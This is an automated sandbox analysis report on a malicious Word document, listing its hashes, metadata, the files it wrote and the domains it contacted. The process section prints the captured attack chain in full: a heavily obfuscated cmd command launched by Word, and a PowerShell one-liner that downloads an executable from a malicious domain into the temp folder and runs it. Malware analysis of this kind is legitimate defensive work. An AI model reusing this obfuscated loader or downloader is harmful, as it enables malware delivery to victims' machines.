File name: | a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a |
Full analysis: | https://app.any.run/tasks/b1a29a33-daa9-42c5-afb7-2dd78d9301d3 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 13:53:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Riley, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 07:59:00 2018, Last Saved Time/Date: Wed Nov 14 07:59:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | AA36B197A72E34B19D2EC9F3C3980724 |
SHA1: | 981FE7ACDF4B1C09B3378F5D620B4F1D6D7F12E2 |
SHA256: | A4D4434C649926CD69C836F3A0579BAF18F7D3C480A115E80138A876BB7ABA0A |
SSDEEP: | 1536:RXF5ocn1kp59gxBK85fBt+a9ScUq8pZe5gx89DpaxpV1w:xFO41k/W483apZe5gx89DpaxpV6 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:14 07:59:00 |
CreateDate: | 2018:11:14 07:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Riley |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3644 | cmd /V:O/C"^s^et M^K^b^h=^{G^+^[^Ihrs^0VDcFRxB^g;5^]j^m^1^'En^P^Ya\k=vi^p^yN}d/z^w^S$^u^l ^o^,e@^b:^2T^OQ^?^-^.(t)^f&&^f^or %^i ^in (3^4,47,^41,^49,6,^7,5^,^49,4^5,^4^5^,4^6^,^43,^13,^4^5,2^8^,3^1,23^,^9^,4^2,^6^3^,^2^3,^17^,4^3,9^,4^2,63,31^,^23,^5,^61,^6^1^,34^,5^2,^3^9^,^39,^47,^35,^47^,^30,44,2^5^,^47,^7,^5,^3^3,5^9,^11^,47^,^2^1^,^3^9^,27^,^24^,1^3^,3^9,^3^4,^4^9^,45^,^33^,2^1,59,^34^,^5^,3^4^,^5^7^,^45,3^1^,^33,^6,33^,^1^6,^18^,^5^9,^41^,^4^7^,7^,^23,59^,42^,34^,^4^5,33^,61^,^6^0^,^2^3,^5^0,2^3^,62^,17^,4^3,^2^5,^45,^7^,^3^1^,6^0^,3^,^42^,^3^5^,7,61,4^9^,21^,^59^,4^,^55,59,26,2^8^,^6^1,5,^1^9^,^52,^5^2,^1^,^4^9^,61,^54,4^9,21^,3^4^,2^6,2^8,^61,^5,^60^,62^,^2,2^3^,29^,56^,^63,^4^0^,^5^9^,4^9,1^4^,49^,2^3,^6^2,1^7^,43^,12,4,21^,46^,3^1,3^6,^49^,4^1^,58,^5^5,5^1^,^20^,49^,11,^61^,4^6,58,^11^,4^7,21^,^4^6^,23^,21^,^7^,^1^4,^2^1^,^45^,53,5^9,^1^4,21,45,5,^6^1^,6^1^,3^4,^23,17,4^3^,1^0,^2^6^,4^2,^46^,^3^1,^4^6,^3^6^,^4^9^,41^,^5^8,5^5^,^5^1,2^0^,^49^,11,6^1,4^6^,^58,^11,47^,2^1^,^46,^23,^2^8^,3^8^,47^,38^,^5^1,5^9,^7,^6^1^,6^,^49,28,2^1^,23^,1^7^,6^3,^47,6,4^9,^28,1^1,^5^,6^0^,^4^3^,^4,5,^15,^46^,^33^,25^,^46,4^3,9^,^4^2,^6^3,^6^2^,^0^,^6^1^,6^,35^,^0^,^43,^12^,^4,^2^1,5^9^,47,^3^4,^49,2^5,^6^0,2^3,^1^,^2^4^,5^4^,2^3^,^48^,4^3,4,5,15^,48^,8^,6^2,1^7,^4^3,1^2,4^,^21,^59,^7,^49^,2^5^,3^8,^60,62,^17^,43,^10^,2^6,^4^2,5^9,^47,3^4^,^49,25,^60^,62,^17,^4^3^,10^,^2^6,^4^2^,5^9^,61^,^35,^3^4,^4^9^,4^6^,^3^1^,4^6^,^22,17,43^,10,26,^42^,59,4^1^,6^,^3^3,6^1^,49^,^6^0^,43,^12,^4,2^1,^5^9^,^6,^4^9^,^7^,^34,47,^25^,^7^,49,15,47,38,^3^5,6^2,^17^,^4^3^,1^0,^26,4^2,59^,7,^2^8^,3^2^,49^,^6^1,4^7,^63^,3^3^,^45,4^9^,6^0^,^4^3^,2^5,^4^5^,^7,^62^,1^7^,4^2^,^6^1^,2^8^,6^,6^1^,^5^8,2^6^,^6,47,1^1,^49,^7,^7,4^6,^43^,^25^,4^5,^7,^1^7,^5^1^,6,^4^9^,2^8,3^0,37^,1^1^,^28^,61,^1^1,5^,0,^3^7,^3^7,^46,^46,^46,4^6,^4^6^,46^,4^6,4^6,^46,46^,^4^6^,^4^6^,^4^6^,46^,^46,^46^,^46,^7^0)^do ^se^t Fh^I^0=!Fh^I^0!!M^K^b^h:~%^i,1!&&i^f %^i g^e^q 7^0 c^all %Fh^I^0:^~^-^405%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3612 | powershell $Rla='VSf';$VSf='http://oyokunoshi.com/YER/pelim.php?l=irig5.wos'.Split('@');$nls=([System.IO.Path]::GetTempPath()+'\Qfz.exe');$FIm =New-Object -com 'msxml2.xmlhttp';$DPS = New-Object -com 'adodb.stream';foreach($IhB in $VSf){try{$FIm.open('GET',$IhB,0);$FIm.send();$DPS.open();$DPS.type = 1;$DPS.write($FIm.responseBody);$DPS.savetofile($nls);Start-Process $nls;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9621.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W6RIR20G4FOTGONZKYT6.temp | — | |
MD5:— | SHA256:— | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:50DDE0B352B6BD888D97EE3BC7019251 | SHA256:A06E78FCC5FD2E462A212087C57E5F46397B2FFD6954B802D5018C1F7629DDE0 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3550A7E0F3366D8A445FBFC5DD23A66 | SHA256:654A5EEFED30887B25796A5645264A82D786784F16D1CFDB40E9FA70C71EB91D | |||
3008 | WINWORD.EXE | C:\Users\admin\Desktop\~$d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc | pgc | |
MD5:EBB6FB938BF9C71D1A75204DBC2A3198 | SHA256:CA859F5433CC8DC60348A9AC26C3E8689EDA7D40EB88671731D2F5DD84622524 | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da8be.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc.LNK | lnk | |
MD5:95CE4F9005052EAEB842AA718DF8F26E | SHA256:3ADEB55BB1EA6620961E830D8A40CDDF56FDF2DCE2BEA4B72250754F6C158ED9 |
Domain | IP | Reputation |
---|---|---|
oyokunoshi.com |
| malicious |
dns.msftncsi.com |
| shared |